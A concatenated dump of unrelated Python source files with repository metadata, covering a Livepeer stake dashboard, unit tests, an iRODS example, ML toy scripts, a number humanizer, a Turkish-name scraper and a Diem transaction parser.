import datetime
from altair.vegalite.v4.schema.core import Legend
import pandas
from pandas.core.frame import DataFrame
import streamlit as st
import time
import bubbletea
st.header("LIVEPEER Stake Movement")
urlvars = bubbletea.parse_url_var([{'key':'startdate','type':'datetime'}, {'key':'enddate','type':'datetime'}])
try:
end_date = urlvars['enddate']
except KeyError:
end_date = datetime.date.today() - datetime.timedelta(days=0)
try:
start_date = urlvars['startdate']
except KeyError:
start_date = end_date - datetime.timedelta(days=7)
date_range = st.date_input("Date range", (start_date, end_date))
if not len(date_range) == 2:
st.warning("*Please select a date range.*")
st.stop()
start_date = date_range[0]
end_date = date_range[1]
start_timestamp = int(time.mktime(start_date.timetuple()))
end_timestamp = int(time.mktime(end_date.timetuple()))
bubbletea.update_url({'startdate': start_date, 'enddate':end_date})
subgraph_url = "https://api.thegraph.com/subgraphs/name/livepeer/livepeer"
query_date_clause = "{timestamp_gte:%s,timestamp_lt:%s}" % (
start_timestamp,
end_timestamp,
)
query = """
{
bondEvents(where: %s, bypassPagination:true)
{
timestamp,
bondedAmount,
round {id},
newDelegate {id},
oldDelegate {id},
delegator {id},
},
unbondEvents(where: %s, bypassPagination:true)
{
timestamp,
amount,
withdrawRound,
round {id},
delegate {id},
delegator {id},
},
rebondEvents(where: %s, bypassPagination:true)
{
timestamp,
amount,
round {id},
delegate {id},
delegator {id},
}
}
""" % (
query_date_clause,
query_date_clause,
query_date_clause,
)
with st.spinner("Loading data from the graph"):
df = bubbletea.beta_load_subgraph(subgraph_url, query, useBigDecimal=True)
df_bond = df["bondEvents"]
df_bond.rename(columns={"bondedAmount": "amount"}, inplace=True)
df_rebond = df["rebondEvents"]
df_unbond = df["unbondEvents"]
i = 0
df_amount = DataFrame()
for df in [df_bond, df_rebond, df_unbond]:
if len(df) > 0:
if i == None:
df_amount = df[["timestamp", "amount", "round.id"]]
else:
df_amount = df_amount.append(df[["timestamp", "amount", "round.id"]])
i += 1
if len(df_amount) == 0:
st.write('No data vailable')
else:
df_amount = df_amount.reset_index()
df_amount_over_time = bubbletea.beta_aggregate_timeseries(
df_amount,
time_column="timestamp",
interval=bubbletea.TimeseriesInterval.DAILY,
columns=[
bubbletea.ColumnConfig(
name="amount",
type=bubbletea.ColumnType.bigdecimal,
aggregate_method=bubbletea.AggregateMethod.SUM,
na_fill_value=0.0,
)
],
)
df_amount_over_time.index.names = ["time"]
st.subheader("Stake moved over time")
st.write(df_amount_over_time)
bubbletea.beta_plot_line(
df_amount_over_time,
x={
"field": "time",
},
y={
"title":"Amount",
"data": [{"title": "Amount", "field": "amount"}],
},
legend="none",
)
df_amount_over_round = bubbletea.beta_aggregate_groupby(
df_amount,
by_column="round.id",
columns=[
bubbletea.ColumnConfig(
name="amount",
type=bubbletea.ColumnType.bigdecimal,
aggregate_method=bubbletea.AggregateMethod.SUM,
na_fill_value=0.0,
)
],
)
df_amount_over_round.index.names = ["round"]
st.write(df_amount_over_round)
bubbletea.beta_plot_line(
df_amount_over_round,
title='Stake moved over rounds',
x={"field": "round", "title": "Round", "type":"ordinal"},# ['quantitative', 'ordinal', 'temporal', 'nominal']
y={
"title":"Amount",
"data": [{"title": "Amount", "field": "amount"}],
},
legend="none"
)
st.subheader("Transcoder Stake Changes")
def process_transcoders():
dfs = []
if len(df_bond) > 0:
df0 = df_bond[["timestamp", "amount", "round.id", "oldDelegate.id"]]
df0.rename(columns={"oldDelegate.id": "transcoder", "amount": "loss"}, inplace=True)
df1 = df_bond[["timestamp", "amount", "round.id", "newDelegate.id"]]
df1.rename(columns={"newDelegate.id": "transcoder", "amount": "gain"}, inplace=True)
dfs.append(df0)
dfs.append(df1)
if len(df_unbond) > 0:
df2 = df_unbond[["timestamp", "amount", "round.id", "delegate.id"]]
df2.rename(columns={"delegate.id": "transcoder", "amount": "loss"}, inplace=True)
dfs.append(df2)
if len(df_rebond) > 0:
df3 = df_rebond[["timestamp", "amount", "round.id", "delegate.id"]]
df3.rename(columns={"delegate.id": "transcoder", "amount": "gain"}, inplace=True)
dfs.append(df3)
df = pandas.DataFrame()
for d in dfs:
if len(df) == 0:
df = d
else:
df = df.append(d)
df.fillna(0.0, inplace=True)
df.reset_index(inplace=True)
return df
df_transcoders = process_transcoders()
df_loss_gains = bubbletea.beta_aggregate_groupby(
df_transcoders,
"transcoder",
columns=[
bubbletea.ColumnConfig(
name="loss",
type=bubbletea.ColumnType.bigdecimal,
aggregate_method=bubbletea.AggregateMethod.SUM,
na_fill_value=0.0,
),
bubbletea.ColumnConfig(
name="gain",
type=bubbletea.ColumnType.bigdecimal,
aggregate_method=bubbletea.AggregateMethod.SUM,
na_fill_value=0.0,
),
],
)
df_loss_gains["total"] = df_loss_gains["loss"] + df_loss_gains["gain"]
st.write(df_loss_gains)
| 28.682464 | 117 | 0.594019 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1,634 | 0.269993 |
1fcde10af6e71da8c4ae91b2cecfc62ef747de93
| 956 |
py
|
Python
|
tests/utils/test_match.py
|
jeremyschlatter/vaccine-feed-ingest
|
215f6c144fe5220deaccdb5db3e96f28b7077b3f
|
[
"MIT"
] | null | null | null |
tests/utils/test_match.py
|
jeremyschlatter/vaccine-feed-ingest
|
215f6c144fe5220deaccdb5db3e96f28b7077b3f
|
[
"MIT"
] | 65 |
2021-05-04T13:05:01.000Z
|
2022-03-31T10:13:49.000Z
|
tests/utils/test_match.py
|
jeremyschlatter/vaccine-feed-ingest
|
215f6c144fe5220deaccdb5db3e96f28b7077b3f
|
[
"MIT"
] | null | null | null |
from vaccine_feed_ingest.utils import match
def test_is_concordance_similar(full_location, minimal_location, vial_location):
assert match.is_concordance_similar(full_location, vial_location)
assert not match.is_concordance_similar(minimal_location, vial_location)
def test_is_address_similar(full_location, minimal_location, vial_location):
assert match.is_address_similar(full_location, vial_location)
assert not match.is_address_similar(minimal_location, vial_location)
def test_is_provider_similar(full_location, minimal_location, vial_location):
assert match.is_provider_similar(full_location, vial_location)
assert not match.is_provider_similar(minimal_location, vial_location)
def test_has_matching_phone_number(full_location, minimal_location, vial_location):
assert match.has_matching_phone_number(full_location, vial_location)
assert not match.has_matching_phone_number(minimal_location, vial_location)
| 36.769231 | 83 | 0.848326 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 |
1fce94867341b2964e24bbb0a90fa03bff2006d5
| 2,201 |
py
|
Python
|
PyRods/examples/user_info.py
|
kaldrill/irodspython
|
9a1018429acf9e86af8fb7ea6f37fb397e0010da
|
[
"CNRI-Python"
] | null | null | null |
PyRods/examples/user_info.py
|
kaldrill/irodspython
|
9a1018429acf9e86af8fb7ea6f37fb397e0010da
|
[
"CNRI-Python"
] | null | null | null |
PyRods/examples/user_info.py
|
kaldrill/irodspython
|
9a1018429acf9e86af8fb7ea6f37fb397e0010da
|
[
"CNRI-Python"
] | null | null | null |
# Copyright (c) 2013, University of Liverpool
#
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU Lesser General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU Lesser General Public License for more details.
#
# You should have received a copy of the GNU Lesser General Public License
# along with this program. If not, see <http://www.gnu.org/licenses/>.
#
#
# Author : Jerome Fuselier
#
from irods import *
if __name__ == "__main__":
status, myEnv = getRodsEnv()
conn, errMsg = rcConnect(myEnv.rodsHost, myEnv.rodsPort,
myEnv.rodsUserName, myEnv.rodsZone)
status = clientLogin(conn)
# Get the information present in the iCAT
print getUserInfo(conn, myEnv.rodsUserName)
#print getUserInfo(conn, myEnv.rodsUserName, myEnv.rodsZone)
# Get an irodsUser object, the zone is optional
user = getUser(conn, myEnv.rodsUserName)
#user = getUser(conn, myEnv.rodsUserName, myEnv.rodsZone)
print "Id:", user.getId()
print "Name:", user.getName()
print "Type:", user.getTypeName()
print "Zone:", user.getZone()
print "Info:", user.getInfo()
print "Comment:", user.getComment()
print "Create TS:", user.getCreateTs()
print "Modify TS:", user.getModifyTs()
# You can modify some of the fields if you are admin
#user.setComment("Useful Comment")
#user.setInfo("Useful info")
# Be careful if you remove your user from rodsadmin you will have trouble to put it back
#user.setTypeName("rodsuser")
# Be careful with this one as changing the zone will change the authentication
#user.setZone("newZone")
# You can get the groups the user belongs to. You obtain irodsGroup instances
print "Member of :"
for g in user.getGroups():
print " -", g.getName()
conn.disconnect()
| 37.305085 | 92 | 0.685597 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1,434 | 0.651522 |
1fd17f1089fdee8a486a2a65c3fb934cc9195151
| 1,072 |
py
|
Python
|
sml_iris_knn_dtc.py
|
drishtim17/supervisedML
|
3981d283a9937bfce793237c171fa95764846558
|
[
"Apache-2.0"
] | null | null | null |
sml_iris_knn_dtc.py
|
drishtim17/supervisedML
|
3981d283a9937bfce793237c171fa95764846558
|
[
"Apache-2.0"
] | null | null | null |
sml_iris_knn_dtc.py
|
drishtim17/supervisedML
|
3981d283a9937bfce793237c171fa95764846558
|
[
"Apache-2.0"
] | null | null | null |
#!/usr/bin/python3
import sklearn
from sklearn.datasets import load_iris
from sklearn.neighbors import KNeighborsClassifier
from sklearn.model_selection import train_test_split
from sklearn import tree
from sklearn.metrics import accuracy_score
#loading iris
iris=load_iris()
#traning flowers.features is stored in iris.data
#output accordingly is stored in iris.target
#now splitting into test and train data sets
train_iris,test_iris,train_target,test_target=train_test_split(iris.data,iris.target,test_size=0.2)
#calling knn algo
knnclf=KNeighborsClassifier(n_neighbors=3)
#calling dsc algo
dsclf=tree.DecisionTreeClassifier()
#data training
knntrained=knnclf.fit(train_iris,train_target)
dsctrained=dsclf.fit(train_iris,train_target)
#testing algo
#predicted output
knnoutput=knntrained.predict(test_iris)
print(knnoutput)
dscoutput=knntrained.predict(test_iris)
print(dscoutput)
#original output
print(test_target)
#calculating accuracy
knnpct=accuracy_score(test_target,knnoutput)
print(knnpct)
dscpct=accuracy_score(test_target,dscoutput)
print(dscpct)
| 24.363636 | 99 | 0.841418 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 282 | 0.26306 |
1fd3b3ac45b4ed570227a76c3f4f622771cac325
| 2,762 |
py
|
Python
|
Python/Exercises/Humanize/humanize.py
|
Gjacquenot/training-material
|
16b29962bf5683f97a1072d961dd9f31e7468b8d
|
[
"CC-BY-4.0"
] | 115 |
2015-03-23T13:34:42.000Z
|
2022-03-21T00:27:21.000Z
|
Python/Exercises/Humanize/humanize.py
|
Gjacquenot/training-material
|
16b29962bf5683f97a1072d961dd9f31e7468b8d
|
[
"CC-BY-4.0"
] | 56 |
2015-02-25T15:04:26.000Z
|
2022-01-03T07:42:48.000Z
|
Python/Exercises/Humanize/humanize.py
|
Gjacquenot/training-material
|
16b29962bf5683f97a1072d961dd9f31e7468b8d
|
[
"CC-BY-4.0"
] | 59 |
2015-11-26T11:44:51.000Z
|
2022-03-21T00:27:22.000Z
|
#!/usr/bin/env python
def humanize(n, base=10, digits=1, unit=''):
'''convert a floating point number to a human-readable format
Parameters
----------
n : float or str
number to convert, it can a string representation of
a floating point number
base : int
base to use, either 2 or 10, default is 10
digits : int
decimal digits to use in format string, default is 1
unit : str
unit to use in format string, default is ''
Returns
-------
str
formatted string
Raises
------
ValueError
raised when base is neither 2 nor 10
Examples
--------
>>> humanize(1234)
'1.2 K'
>>> humanize(1234, digits=2)
'1.23 K'
>>> humanize(1234, base=2, digits=2)
'1.21 K'
>>> humanize(1234, unit='B')
'1.2 KB'
>>> humanize('1234.56', digits=4, unit='B')
'1.2346 KB'
>>> humanize(0.0123)
'12.3 m'
'''
import math
if base != 2 and base != 10:
raise ValueError('base should be 2 or 10, not {:d}'.format(base))
thousands = 3 if base == 10 else 10
orders = {
-3: 'n',
-2: 'u',
-1: 'm',
0: '',
1: 'K',
2: 'M',
3: 'G',
4: 'T',
5: 'P',
}
fmt_str = '{{0:.{}f}} {{1:s}}{{2:s}}'.format(digits)
exp = math.log(math.fabs(float(n)), base**thousands)
exp = int(exp - (1 if exp < 0 else 0))
number = float(n)/base**(exp*thousands)
return fmt_str.format(number, orders[exp], unit)
def check_line(line):
try:
_ = float(line)
return True
except:
return False
if __name__ == '__main__':
from argparse import ArgumentParser
import sys
arg_parser = ArgumentParser(description='convert numbers to '
'human-readable format')
arg_parser.add_argument('n', type=float, nargs='?',
help='number to convert')
arg_parser.add_argument('-d', type=int, default=1,
help='number of significant digits')
arg_parser.add_argument('-b', action='store_true',
help='use base 2')
arg_parser.add_argument('-u', default='', help='unit to display')
options = arg_parser.parse_args()
base = 2 if options.b else 10
if options.n:
print('{0:s}'.format(humanize(options.n, base=base, digits=options.d,
unit=options.u)))
else:
for line in sys.stdin:
if check_line(line):
print('{0:s}'.format(humanize(line.strip(), base=base,
digits=options.d,
unit=options.u)))
| 28.474227 | 77 | 0.513034 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1,164 | 0.421434 |
1fd529b1fbfbcec29e94685aeef6fbda0d26c559
| 1,337 |
py
|
Python
|
data/Latent.py
|
YoungjuNa-KR/Gaze_estimator_implementation
|
95482db40ddef413870f51dadc907910d624ee6e
|
[
"MIT"
] | null | null | null |
data/Latent.py
|
YoungjuNa-KR/Gaze_estimator_implementation
|
95482db40ddef413870f51dadc907910d624ee6e
|
[
"MIT"
] | null | null | null |
data/Latent.py
|
YoungjuNa-KR/Gaze_estimator_implementation
|
95482db40ddef413870f51dadc907910d624ee6e
|
[
"MIT"
] | 1 |
2022-02-03T11:11:21.000Z
|
2022-02-03T11:11:21.000Z
|
import os
import PIL
import torch
from glob import glob
from torch.utils.data import DataLoader
from torchvision.transforms.functional import pil_to_tensor
class Latent(torch.utils.data.Dataset):
def __init__(self, dir_name, transforms=None):
# dataset 디렉토리를 기반으로 parse.data_train, test에 따라서
# 각각 다른 디렉토리에 접근할 수 있도록 한다.
self.root_dir = os.path.join("./dataset", dir_name)
self.imgs = os.listdir(self.root_dir)
self.transform = None
# 데이터셋의 개별 텐서의 경로가 저장된다.
self.data = []
# 저장된 텐서 경로의 인덱스를 나타낸다.
self.label = []
# 개별적으로 텐서에 접근하고, 대응하는 라벨을 저장한다.
for i, img in enumerate(self.imgs):
img_path = os.path.join(self.root_dir, img)
for img in glob(os.path.join(img_path)):
self.data.append(img)
self.label.append(i)
# 클래스 변수로 저장된 이미지와 라벨에 대한 정보를 위한 함수이다.
def __getitem__(self, idx):
img_path, label = self.data[idx], self.label[idx]
# os.path.basename으로 단일 이미지명을 얻을 수 있도록 한다.
img_name = os.path.basename(img_path)
img = torch.load(img_path)
img = img.type('torch.FloatTensor')
sample = {"image" : img, "label" : label, "name" : img_name}
return sample
def __len__(self):
return len(self.data)
| 29.711111 | 68 | 0.604338 | 1,433 | 0.896185 | 0 | 0 | 0 | 0 | 0 | 0 | 547 | 0.342089 |
1fd5cfc21f6a649e70a7b0760d51e47fca8f6d12
| 1,069 |
py
|
Python
|
day/day_05/solution.py
|
moki/aoc2015
|
da43fccd20d154840161c022d1f3c0f70035d604
|
[
"BSD-3-Clause"
] | null | null | null |
day/day_05/solution.py
|
moki/aoc2015
|
da43fccd20d154840161c022d1f3c0f70035d604
|
[
"BSD-3-Clause"
] | null | null | null |
day/day_05/solution.py
|
moki/aoc2015
|
da43fccd20d154840161c022d1f3c0f70035d604
|
[
"BSD-3-Clause"
] | null | null | null |
def count_vowel(line):
return len([c for c in line if c in "aeiou"])
def is_vowelly(line):
return count_vowel(line) > 2
def is_doublly(line):
return len(
[line[i] for i in range(len(line) - 1) if line[i] == line[i + 1]])
def is_valid(line):
return not sum(c in line for c in ['ab', 'cd', 'pq', 'xy'])
def part_1(input):
return len([
line for line in input.split("\n")
if is_vowelly(line) and is_doublly(line) and is_valid(line)
])
def part_2(input):
lines = input.split("\n")
counter = 0
for line in lines:
cond_1 = False
for i in range(len(line) - 2):
for j in range(i + 2, len(line) - 1):
if line[i] == line[j] and line[i + 1] == line[j + 1]:
cond_1 = True
break
cond_2 = False
for i in range(1, len(line) - 1):
if line[i - 1] == line[i + 1]:
cond_2 = True
break
if cond_1 and cond_2:
counter = counter + 1
return counter
| 21.38 | 74 | 0.507951 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 31 | 0.028999 |
1fd676c1868fb5496119162edb66de118a176730
| 876 |
py
|
Python
|
scripts/mklanguages.py
|
yasen-m/dosage
|
81fe088621ad335cac2a53fcbc7b9b37f49ddce2
|
[
"MIT"
] | null | null | null |
scripts/mklanguages.py
|
yasen-m/dosage
|
81fe088621ad335cac2a53fcbc7b9b37f49ddce2
|
[
"MIT"
] | null | null | null |
scripts/mklanguages.py
|
yasen-m/dosage
|
81fe088621ad335cac2a53fcbc7b9b37f49ddce2
|
[
"MIT"
] | null | null | null |
#!/usr/bin/python
# update languages.py from pycountry
import os
import codecs
import pycountry
basepath = os.path.dirname(os.path.dirname(__file__))
def main():
"""Update language information in dosagelib/languages.py."""
fn =os.path.join(basepath, 'dosagelib', 'languages.py')
encoding = 'utf-8'
with codecs.open(fn, 'w', encoding) as f:
f.write('# -*- coding: %s -*-%s' % (encoding, os.linesep))
f.write('# ISO 693-1 language codes from pycountry%s' % os.linesep)
write_languages(f)
def write_languages(f):
"""Write language information."""
f.write("Iso2Language = {%s" % os.linesep)
for language in pycountry.languages:
if hasattr(language, 'alpha2'):
f.write(" %r: %r,%s" % (language.alpha2, language.name, os.linesep))
f.write("}%s" % os.linesep)
if __name__ == '__main__':
main()
| 29.2 | 83 | 0.634703 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 308 | 0.351598 |
1fd6b807f6071d9b5d2c510c8209a51bbbc35084
| 531 |
py
|
Python
|
reference/for_and_while.py
|
SeanSyue/TensorflowReferences
|
2c93f4c770e2713ef4769f287e022d03e7097188
|
[
"MIT"
] | null | null | null |
reference/for_and_while.py
|
SeanSyue/TensorflowReferences
|
2c93f4c770e2713ef4769f287e022d03e7097188
|
[
"MIT"
] | null | null | null |
reference/for_and_while.py
|
SeanSyue/TensorflowReferences
|
2c93f4c770e2713ef4769f287e022d03e7097188
|
[
"MIT"
] | null | null | null |
import tensorflow as tf
x = tf.Variable(0, name='x')
model = tf.global_variables_initializer()
with tf.Session() as session:
for i in range(5):
session.run(model)
x = x + 1
print(session.run(x))
x = tf.Variable(0., name='x')
threshold = tf.constant(5.)
model = tf.global_variables_initializer()
with tf.Session() as session:
session.run(model)
while session.run(tf.less(x, threshold)):
x = x + 1
x_value = session.run(x)
print(x_value)
| 19.666667 | 46 | 0.589454 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 6 | 0.011299 |
1fd6f57e7b90621a24c47afd31d7bbd91668d230
| 59 |
py
|
Python
|
raising_exception_3.py
|
godontop/python-work
|
ea22e0df8b0b17605f5a434e556a388d1f75aa47
|
[
"MIT"
] | null | null | null |
raising_exception_3.py
|
godontop/python-work
|
ea22e0df8b0b17605f5a434e556a388d1f75aa47
|
[
"MIT"
] | null | null | null |
raising_exception_3.py
|
godontop/python-work
|
ea22e0df8b0b17605f5a434e556a388d1f75aa47
|
[
"MIT"
] | null | null | null |
try:
num = 5 / 0
except:
print("An error occured")
raise
| 11.8 | 26 | 0.644068 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 18 | 0.305085 |
1fd7ed8a83b56f175881d6f318fa389d67ee450a
| 732 |
py
|
Python
|
bewerte/muendlich.py
|
jupfi81/NotenManager
|
ee96a41088bb898c025aed7b3c904741cb71d004
|
[
"MIT"
] | null | null | null |
bewerte/muendlich.py
|
jupfi81/NotenManager
|
ee96a41088bb898c025aed7b3c904741cb71d004
|
[
"MIT"
] | null | null | null |
bewerte/muendlich.py
|
jupfi81/NotenManager
|
ee96a41088bb898c025aed7b3c904741cb71d004
|
[
"MIT"
] | null | null | null |
"""Berechnet die mündliche Note"""
import csv
with open('bewertung.csv', encoding='utf-8', mode='r') as bewertung:
TABELLE = []
DATA = csv.reader(bewertung, delimiter=',')
for row in DATA:
TABELLE.append([element.strip() for element in row])
OUTPUT = [TABELLE[0] + ["Note"]]
del TABELLE[0]
for row in TABELLE:
if len(row) > 3:
note = 20*float(row[2]) + 20*float(row[3]) + 40*float(row[4]) + 20*float(row[5])
note = round(note/25, 0)/4
row = row + [note]
OUTPUT.append(row)
with open('note.csv', encoding='utf-8', mode='w') as safe:
WRITER = csv.writer(safe, delimiter=',')
for row in OUTPUT:
WRITER.writerow(row)
| 31.826087 | 92 | 0.562842 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 92 | 0.125512 |
1fd7f7aa485ce2ad0b848a0e2bbaa8cf36a6c24a
| 410 |
py
|
Python
|
python3/tests/test_edit_distance.py
|
qianbinbin/leetcode
|
915cecab0c940cd13847683ec55b17b77eb0f39b
|
[
"MIT"
] | 4 |
2018-03-05T02:27:16.000Z
|
2021-03-15T14:19:44.000Z
|
python3/tests/test_edit_distance.py
|
qianbinbin/leetcode
|
915cecab0c940cd13847683ec55b17b77eb0f39b
|
[
"MIT"
] | null | null | null |
python3/tests/test_edit_distance.py
|
qianbinbin/leetcode
|
915cecab0c940cd13847683ec55b17b77eb0f39b
|
[
"MIT"
] | 2 |
2018-07-22T10:32:10.000Z
|
2018-10-20T03:14:28.000Z
|
from unittest import TestCase
from leetcodepy.edit_distance import *
solution1 = Solution1()
word11 = "horse"
word12 = "ros"
expected1 = 3
word21 = "intention"
word22 = "execution"
expected2 = 5
class TestEditDistance(TestCase):
def test1(self):
self.assertEqual(expected1, solution1.minDistance(word11, word12))
self.assertEqual(expected2, solution1.minDistance(word21, word22))
| 17.083333 | 74 | 0.731707 | 204 | 0.497561 | 0 | 0 | 0 | 0 | 0 | 0 | 34 | 0.082927 |
1fd8f8fea0aa37bc2adfbcbf6dda99e537d99a7f
| 805 |
py
|
Python
|
pageobject/commands/index.py
|
lukas-linhart/pageobject
|
6ae83680ae62a94f93cefc394e4f3cc6999aeead
|
[
"MIT"
] | 1 |
2017-01-12T06:15:36.000Z
|
2017-01-12T06:15:36.000Z
|
pageobject/commands/index.py
|
lukas-linhart/pageobject
|
6ae83680ae62a94f93cefc394e4f3cc6999aeead
|
[
"MIT"
] | null | null | null |
pageobject/commands/index.py
|
lukas-linhart/pageobject
|
6ae83680ae62a94f93cefc394e4f3cc6999aeead
|
[
"MIT"
] | null | null | null |
def index(self, value):
"""
Return index of the first child containing the specified value.
:param str value: text value to look for
:returns: index of the first child containing the specified value
:rtype: int
:raises ValueError: if the value is not found
"""
self.logger.info('getting index of text "{}" within page object list {}'.format(value, self._log_id_short))
self.logger.debug('getting index of text "{}" within page object list; {}'.format(value, self._log_id_long))
index = self.text_values.index(value)
self.logger.info('index of text "{}" within page object list {} is {}'.format(value, self._log_id_short, index))
self.logger.debug('index of text "{}" within page object is {}; {}'.format(value, index, self._log_id_long))
return index
| 47.352941 | 116 | 0.690683 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 474 | 0.58882 |
1fda8ca8896b2d1bcde84055f16e53f955e23e9c
| 2,724 |
py
|
Python
|
vlsopt/data_factory/transaction_factory.py
|
violas-core/bvexchange
|
74cf3197aad02e0f5e2dac457266d11c9c8cc746
|
[
"MIT"
] | null | null | null |
vlsopt/data_factory/transaction_factory.py
|
violas-core/bvexchange
|
74cf3197aad02e0f5e2dac457266d11c9c8cc746
|
[
"MIT"
] | null | null | null |
vlsopt/data_factory/transaction_factory.py
|
violas-core/bvexchange
|
74cf3197aad02e0f5e2dac457266d11c9c8cc746
|
[
"MIT"
] | 1 |
2022-01-05T04:39:47.000Z
|
2022-01-05T04:39:47.000Z
|
#!/usr/bin/python3
import operator
import sys
import json
import os
sys.path.append(os.path.join(os.path.dirname(os.path.abspath(__file__)), "./"))
sys.path.append(os.path.join(os.path.dirname(os.path.abspath(__file__)), "../"))
sys.path.append(os.path.join(os.path.dirname(os.path.abspath(__file__)), "../../"))
sys.path.append(os.path.join(os.path.dirname(os.path.abspath(__file__)), "../../lbdiemsdk/src"))
from diem import (
jsonrpc,
)
from factory_base import (
factory_base,
field
)
def parse_events(events):
datas = []
if events:
for event in events:
datas.append({
"key":event.key,
"sequence_number": event.sequence_number,
"data": {
"type": event.data.type,
"amount": {
"amount": event.data.amount.amount,
"currency": event.data.amount.currency,
},
"sender" : event.data.sender,
"receiver": event.data.receiver,
}
})
return datas
def parse_state(state):
return state == "executed"
class transaction_factory(factory_base):
global parse_state
tran_fields = [
field("tran_type", "transaction.type"),
field("script_type", "transaction.script.type"),
field("token_id", "transaction.script.currency"),
field("data", "transaction.script.metadata"),
field("receiver", "transaction.script.receiver"),
field("gas_token", "transaction.gas_currency"),
field("gas_unit_price", "transaction.gas_unit_price"),
field("max_gas_amount", "transaction.max_gas_amount"),
field("amount", "transaction.script.amount"),
field("sequence_number", "transaction.sequence_number"),
field("vm_status", "vm_status.type"),
field("state", "vm_status.type", parse_state),
field("gas_used", "gas_used"),
field("version", "version"),
field("events", "events", parse_events),
]
def __init__(self, data):
factory_base.__init__(self, data)
self.__init_show_fields()
def __init_show_fields(self):
self.set_fields(self.tran_fields)
default_outputs = {"state": "not support",
"events_len" : len(self.events)}
self.extend_default_outputs(default_outputs)
def get_version(self):
return self.get_attr_with_path(self.get_field("version").path)
| 33.62963 | 96 | 0.551762 | 1,521 | 0.55837 | 0 | 0 | 0 | 0 | 0 | 0 | 675 | 0.247797 |
1fdabe81a3501b610902f47c9629b3212106ad89
| 3,746 |
py
|
Python
|
python/tdk_fetch.py
|
selcukcihan/namewizard
|
c2aeb3fd1eb3ce839d0e3a145bdf2a6df354d568
|
[
"CC0-1.0"
] | null | null | null |
python/tdk_fetch.py
|
selcukcihan/namewizard
|
c2aeb3fd1eb3ce839d0e3a145bdf2a6df354d568
|
[
"CC0-1.0"
] | null | null | null |
python/tdk_fetch.py
|
selcukcihan/namewizard
|
c2aeb3fd1eb3ce839d0e3a145bdf2a6df354d568
|
[
"CC0-1.0"
] | null | null | null |
#!/usr/bin/env python
from BeautifulSoup import BeautifulSoup
import json
import urllib
import urllib2
import re
import time
import os.path
def getgoogleurl(search,siteurl=False):
search = search.encode("utf-8")
if siteurl==False:
return 'http://www.google.com/search?q='+urllib.quote_plus(search)
else:
return 'http://www.google.com/search?q=site:'+urllib.quote_plus(siteurl)+'%20'+urllib.quote_plus(search)
def getgooglelinks(search,siteurl=False):
#google returns 403 without user agent
headers = {'User-agent':'Safari/537.36'}
req = urllib2.Request(getgoogleurl(search,siteurl),None,headers)
site = urllib2.urlopen(req)
data = site.read()
site.close()
m = re.search("([0-9.]+) sonu", data)
count = -1
if m:
count = m.groups()[0].replace(".", "")
return int(count)
names = {}
if os.path.exists("names.txt"):
with open("names.txt") as f:
for line in f.readlines():
tokens = line.split(" ")
names[tokens[0].decode("utf-8")] = (tokens[0].decode("utf-8"), tokens[1] == "1", int(tokens[2]), tokens[3].decode("utf-8"))
f = open("names.txt", 'a+')
print_counter = 0
def handle_span(dct, spans, is_male, fl):
global print_counter
p = re.compile('&uid=(\d+)&')
for span in spans:
n = span.parent.text.split()[0]
m = p.search(span.parent["href"])
nameId = m.group(1)
if n not in dct:
ncnt = -1
for _i in range(5):
try:
ncnt = getgooglelinks(n)
break
except Exception as err:
print err, n
time.sleep(5)
if ncnt == -1:
raise Exception("getgooglelinks not working")
dct[n] = (n, is_male, ncnt, nameId)
fl.write("%s %d %d %s\n" % (n.encode("utf-8"), is_male, ncnt, nameId.encode("utf-8")))
if print_counter % 40 == 0:
print n, is_male, ncnt, nameId
print_counter += 1
else:
print "skipping", n
searching = "aeiou"
beginning = 0
pageno = 1
page = 1
searchforindex = 0
guid = urllib.urlencode({'guid': "TDK.GTS.574eccc8396288.52796697"})
if os.path.exists('names_input.txt'):
with open('names_input.txt') as ini:
beginning, pageno = map(int, ini.readline().split())
try:
for searchforindex in range(beginning, len(searching)):
searchfor = searching[searchforindex]
pagebegin = 1 if searchforindex > beginning else pageno
tokenq = urllib.urlencode({'name': searchfor})
for page in range(pagebegin, 122):
print "fetching", page, "of", searchfor
pageq = urllib.urlencode({'page': page})
url = 'http://tdk.gov.tr/index.php?option=com_kisiadlari&arama=adlar&like=0&cinsi=0&turu=0&%s&%s&%s' % (guid, pageq, tokenq)
response = None
for _i in range(5):
try:
response = urllib.urlopen(url)
break
except Exception as err:
print err
time.sleep(5)
if not response:
raise Exception("urllib.urlopen not working for " + url)
soup = BeautifulSoup(response)
female_spans = soup.body.findAll('span', attrs={'id' : 'cinsiyet1'})
male_spans = soup.body.findAll('span', attrs={'id' : 'cinsiyet2'})
handle_span(names, female_spans, False, f)
handle_span(names, male_spans, True, f)
except Exception as e:
print e.__doc__
print e.message
ini = open("names_input.txt", 'w+')
ini.write("%d %d\n" % (searchforindex, page))
ini.close()
f.close()
| 32.293103 | 136 | 0.570208 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 645 | 0.172184 |
1fdadaa704a4a57bab069bbf9519d57e9bc28d25
| 3,703 |
py
|
Python
|
tests/test_source.py
|
j18ter/exchangelib
|
afb0df65c5533999bca92e25be4c00de5c03043c
|
[
"BSD-2-Clause"
] | null | null | null |
tests/test_source.py
|
j18ter/exchangelib
|
afb0df65c5533999bca92e25be4c00de5c03043c
|
[
"BSD-2-Clause"
] | null | null | null |
tests/test_source.py
|
j18ter/exchangelib
|
afb0df65c5533999bca92e25be4c00de5c03043c
|
[
"BSD-2-Clause"
] | null | null | null |
from exchangelib.errors import (
ErrorAccessDenied,
ErrorFolderNotFound,
ErrorInvalidOperation,
ErrorItemNotFound,
ErrorNoPublicFolderReplicaAvailable,
)
